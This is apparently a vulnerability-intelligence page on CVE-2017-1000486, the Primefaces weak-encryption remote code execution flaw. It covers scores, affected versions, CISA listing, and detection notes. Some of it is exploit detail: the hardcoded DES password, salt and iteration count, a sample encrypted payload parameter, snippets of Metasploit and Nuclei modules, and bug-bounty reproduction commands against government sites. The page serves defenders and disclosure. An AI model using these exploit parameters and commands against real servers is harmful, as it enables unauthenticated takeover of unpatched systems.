CVE-2017-1000486
published 2018-01-03CVE-2017-1000486: Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution
PriorityP195critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2022-07-10
Exploited in the wild
EPSS
94.10%
99.8th percentile
Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| primetek | primefaces | 4.0 – 4.0.24 | — |
| primetek | primefaces | >= 5.0 < 5.2.21 | 5.2.21 |
| primetek | primefaces | >= 5.3 < 5.3.8 | 5.3.8 |
Detection & IOCsextracted from sources · hover to see the quote
path/javax.faces.resource/dynamiccontent.properties.xhtml
otherpfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVbBkVHj5xLXXCaFGpOHe704aOkNwaB12Cc3Iq6NmBo%2BQZuqhqtPxdTA%3D%3D
otherMogwailabs: CHECKCHECK (response header)
bytes↗
DES salt: a9 9b c8 32 56 34 e3 03, iterationCount: 19
- →The exploit uses DES encryption with a hardcoded password 'primefaces', a fixed salt (0xa9,0x9b,0xc8,0x32,0x56,0x34,0xe3,0x03), and iteration count of 19 to encrypt the EL payload in the pfdrid parameter. Decrypting pfdrid values with these parameters can confirm malicious payloads. ↗
- →The Nuclei template checks for the custom response header 'Mogwailabs: CHECKCHECK' to confirm successful EL injection; defenders can alert on this header appearing in HTTP responses.
- →The exploit injects Java EL expressions using javax.script.ScriptEngineManager to obtain a JavaScript engine and execute OS commands via java.lang.ProcessBuilder. Monitor application logs for ScriptEngineManager or ProcessBuilder references in JSF resource requests. ↗
- →FIN13 (Elephant Beetle) has been observed exploiting CVE-2017-1000486 for initial access; correlate Primefaces exploit attempts with subsequent web shell deployment (JspSpy, reGeorg, MiniWebCmdShell) and xp_cmdshell usage.
- →The Metasploit check method injects an EL expression that sets a custom response header 'primesecretchk' to a random value; monitor for unexpected custom headers in HTTP responses from JSF applications as a sign of active probing. ↗
- ·The vulnerability only affects Primefaces versions prior to 5.2.21, 5.3.8, or 6.0. The weak crypto stems from use of DES with a default hardcoded password ('primefaces') and fixed salt; upgrading to 5.2.21+, 5.3.8+, or 6.0+ mitigates the issue. ↗
- ·The default RPORT for the Metasploit module is 80; deployments on non-standard ports will require adjusted detection rules targeting the vulnerable URI path rather than a specific port. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
Primetek Primefaces Remote Code Execution Vulnerability
cisa·2022-01-10·CVSS 9.8
CVE-2017-1000486 [CRITICAL] CWE-326 Primetek Primefaces Remote Code Execution Vulnerability
Vulnerability: Primetek Primefaces Remote Code Execution Vulnerability
Affected: Primetek Primefaces Application
Primetek Primefaces is vulnerable to a weak encryption flaw resulting in remote code execution
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2017-1000486
Remediation Due Date: 2022-07-10
OSV
Inadequate Encryption Strength
osv·2021-06-03
CVE-2017-1000486 [CRITICAL] Inadequate Encryption Strength
Inadequate Encryption Strength
Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution
GHSA
Inadequate Encryption Strength
ghsa·2021-06-03
CVE-2017-1000486 [CRITICAL] CWE-326 Inadequate Encryption Strength
Inadequate Encryption Strength
Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution
VulnCheck
Primetek Primefaces Remote Code Execution Vulnerability
vulncheck·2017·CVSS 9.8
CVE-2017-1000486 [CRITICAL] CWE-326 Primetek Primefaces Remote Code Execution Vulnerability
Primetek Primefaces Remote Code Execution Vulnerability
Primetek Primefaces is vulnerable to a weak encryption flaw resulting in remote code execution
Affected: Primetek Primefaces Application
Required Action: Apply updates per vendor instructions.
Exploitation References: https://f.hubspotusercontent30.net/hubfs/8776530/Sygnia-%20Elephant%20Beetle_Jan2022.pdf; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-28&host_type=src&vulnerability=cve-2017-1000486; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-29&host_type=src&vulnerability=cve-2017-1000486; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day
No detection rules found.
Exploit-DB
Primefaces 5.x - Remote Code Execution (Metasploit)
exploitdb·2018-01-18·CVSS 9.8
CVE-2017-1000486 [CRITICAL] Primefaces 5.x - Remote Code Execution (Metasploit)
Primefaces 5.x - Remote Code Execution (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'CVE-2017-1000486 Primefaces Remote Code Execution Exploit',
'Description' => %q{
This module exploits an expression language remote code execution flaw in the Primefaces JSF framework.
Primefaces versions prior to 5.2.21, 5.3.8 or 6.0 are vulnerable to a padding oracle attack, due to the use of weak crypto and default encryption password and salt.
},
'Author' => [ 'Bjoern Schuette' ],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', 'CVE-2017-1000486'],
['URL', 'http://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html'],
['URL', 'https://cryptosense
Nuclei
Primetek Primefaces 5.x - Remote Code Execution
nuclei·CVSS 9.8
CVE-2017-1000486 [CRITICAL] Primetek Primefaces 5.x - Remote Code Execution
Primetek Primefaces 5.x - Remote Code Execution
Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution.
Template:
id: CVE-2017-1000486
info:
name: Primetek Primefaces 5.x - Remote Code Execution
author: Moritz Nentwig
severity: critical
description: Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
remediation: |
Apply the latest security patches or upgrade to a newer version of the Primetek Primefaces application.
reference:
- https://github.com/mogwailabs/CVE-2017-1000486
- https://github.com/pimps/CVE-2017-1000486
- https://blog.mindedsecurity.com/2016/02/rce-in-
Metasploit
Primefaces Remote Code Execution Exploit
metasploit
Primefaces Remote Code Execution Exploit
Primefaces Remote Code Execution Exploit
This module exploits a Java Expression Language remote code execution flaw in the Primefaces JSF framework. Primefaces versions prior to 5.2.21, 5.3.8 or 6.0 are vulnerable to a padding oracle attack, due to the use of weak crypto and default encryption password and salt. Tested against Docker image with Tomcat 7.0 with the Primefaces 5.2 showcase application. See documentation for working payloads.
HackerOne
RCE in ██████ subdomain via CVE-2017-1000486
hackerone·2021-04-08·CVSS 9.8
CVE-2017-1000486 [CRITICAL] RCE in ██████ subdomain via CVE-2017-1000486
RCE in ██████ subdomain via CVE-2017-1000486
**Summary:**
The application at ████████/ftn-Website/ uses primefaces 5.3 but not 5.3.8, making it vulnerable to unauthenticated RCE CVE-2017-1000486.
## Step-by-step Reproduction Instructions
1. Get the publicly available POC for this vulnerability here: https://github.com/pimps/CVE-2017-1000486
2. Execute: `python primefaces.py ███/ftn-Website/ -c id`
3. Success: `uid=91(tomcat) gid=91(tomcat) groups=91(tomcat) context=system_u:system_r:tomcat_t:s0`
## Product, Version, and Configuration (If applicable)
primefaces 5.3
## Suggested Mitigation/Remediation Actions
Update primefaces.
## Impact
An unauthenticated, 3rd-party attacker or adversary can execute remote code on restsvr1.ftn.research.usafa.edu as the unix `tomcat` user. Note that t
HackerOne
RCE (Remote code execution) in one of DoD's websites
hackerone·2020-07-30·CVSS 9.8
CVE-2017-1000486 [CRITICAL] RCE (Remote code execution) in one of DoD's websites
RCE (Remote code execution) in one of DoD's websites
**Summary:**
The targeted website is vulnerable to CVE-2017-1000486, by only running command was (whoami) to prove that the RCE exist has been run successfully on the target
**Description:**
The target uses a vulnerable version of primefaces : Primetek Primefaces 5.x, that is vulnerable to a weak encryption flaw resulting in remote code execution
## Impact
Critical
## Step-by-step Reproduction Instructions
Using the following exploit : https://github.com/pimps/CVE-2017-1000486
1. python primefaces.py████████/
## Product, Version, and Configuration (If applicable)
Primefaces 5.3.6
## Suggested Mitigation/Remediation Actions
Primefaces has to be updated to a newer version
## Impact
An attacker could execute remote codes on the target s
Threat Intel
FIN13 (FIN13, Elephant Beetle)
threat_intel·CVSS 10.0
[CRITICAL] FIN13 (FIN13, Elephant Beetle)
# Threat Actor Profile: FIN13
ATT&CK ID: G1016
Also known as: FIN13, Elephant Beetle
## Overview
FIN13 is a financially motivated cyber threat group that has targeted the financial, retail, and hospitality industries in Mexico and Latin America, as early as 2016. FIN13 achieves its objectives by stealing intellectual property, financial data, mergers and acquisition information, or PII.(Citation: Mandiant FIN13 Aug 2022)(Citation: Sygnia Elephant Beetle Jan 2022)
## Techniques (TTPs)
### Reconnaissance
- T1589 Gather Victim Identity Information
Usage: FIN13 has researched employees to target for social engineering attacks.(Citation: Mandiant FIN13 Aug 2022)
- T1590.004 Network Topology
Usage: FIN13 has searched for infrastructure that can provide remote access to an environment for targ
http://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.htmlhttps://cryptosense.com/weak-encryption-flaw-in-primefaces/https://github.com/primefaces/primefaces/issues/1152https://www.exploit-db.com/exploits/43733/http://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.htmlhttps://cryptosense.com/weak-encryption-flaw-in-primefaces/https://github.com/primefaces/primefaces/issues/1152https://www.exploit-db.com/exploits/43733/https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2017-1000486
2018-01-03
Published
2022-01-10
Added to CISA KEV
Exploited in the wild